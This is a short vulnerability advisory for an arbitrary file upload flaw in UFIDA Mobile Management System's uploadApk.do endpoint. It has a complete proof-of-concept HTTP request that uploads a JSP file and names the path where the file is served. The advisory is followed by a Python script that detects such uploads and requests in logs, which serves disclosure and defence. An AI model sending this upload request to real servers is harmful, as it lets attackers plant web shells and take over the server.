UFIDA Mobile Management System uploadApk.do arbitrary file upload vulnerability
Vulnerability Description
The uploadApk.do interface of UFIDA Mobile Management System has an arbitrary file upload vulnerability; an attacker can use it to obtain server permissions.
Vulnerability Impact
UFIDA Mobile Management System
Network surveying and mapping
Vulnerability reproduction
Login page
Verification PoC
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword

hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
/maupload/apk/a.jsp
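
Detection logic for the request and path shown above, added here as an example and not part of the original post: it flags multipart uploads to uploadApk.do whose filename is not an .apk, and access-log hits on script files under /maupload/apk/. The .apk allow-list, the combined access-log format and all sample data (host, IPs, timestamps, boundary) are assumptions.

```python
import re
from email import message_from_bytes

UPLOAD_PATH = "/maportal/appmanager/uploadApk.do"  # endpoint named in the write-up
SERVED_PREFIX = "/maupload/apk/"                   # where the uploaded file is served
ALLOWED_EXT = {".apk"}          # assumption: only APK packages are legitimate here
SCRIPT_EXT = {".jsp", ".jspx"}  # server-side script types that should never appear
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def ext(name):
    """Lower-cased file extension, ignoring trailing dots and spaces."""
    m = re.search(r"\.[A-Za-z0-9]+$", name.rstrip(". "))
    return m.group(0).lower() if m else ""

def bad_upload_names(raw):
    """Filenames in a raw POST to uploadApk.do whose extension is not allowed."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    req = lines[0].split(" ")
    if len(req) < 2 or req[0] != "POST" or req[1].split("?")[0].split(";")[0] != UPLOAD_PATH:
        return []
    ctype = next((l for l in lines[1:] if l.lower().startswith("content-type:")), "")
    msg = message_from_bytes(ctype.encode("latin-1") + b"\r\n\r\n" + body)
    names = [part.get_filename() for part in msg.walk()]
    return [n for n in names if n and ext(n) not in ALLOWED_EXT]

def script_requests(log_lines):
    """(path, status) for access-log hits on script files under the upload directory."""
    found = (LOG_RE.search(line) for line in log_lines)
    hits = [(m.group(1).split("?")[0], int(m.group(2))) for m in found if m]
    return [h for h in hits if h[0].startswith(SERVED_PREFIX) and ext(h[0]) in SCRIPT_EXT]

# Constructed sample data: host, IPs, timestamps and boundary are placeholders.
SAMPLE_REQUEST = b"\r\n".join([
    b"POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1",
    b"Host: mms.example.internal",
    b"Content-Type: multipart/form-data; boundary=----demo", b"",
    b"------demo",
    b'Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"',
    b"Content-Type: application/msword", b"", b"hello",
    b"------demo--", b""])
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1" 200 2',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /maupload/apk/a.jsp HTTP/1.1" 200 5',
    '192.0.2.20 - - [01/Jan/2024:10:01:00 +0000] "GET /maupload/apk/client.apk HTTP/1.1" 200 1048576',
]
if __name__ == "__main__":
    print(bad_upload_names(SAMPLE_REQUEST))
    print(script_requests(SAMPLE_LOG))
```

A 200 response to a script file under the upload directory means the file was both stored and served, which is the condition to alert on.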
This post is licensed under CC BY 4.0 by the author.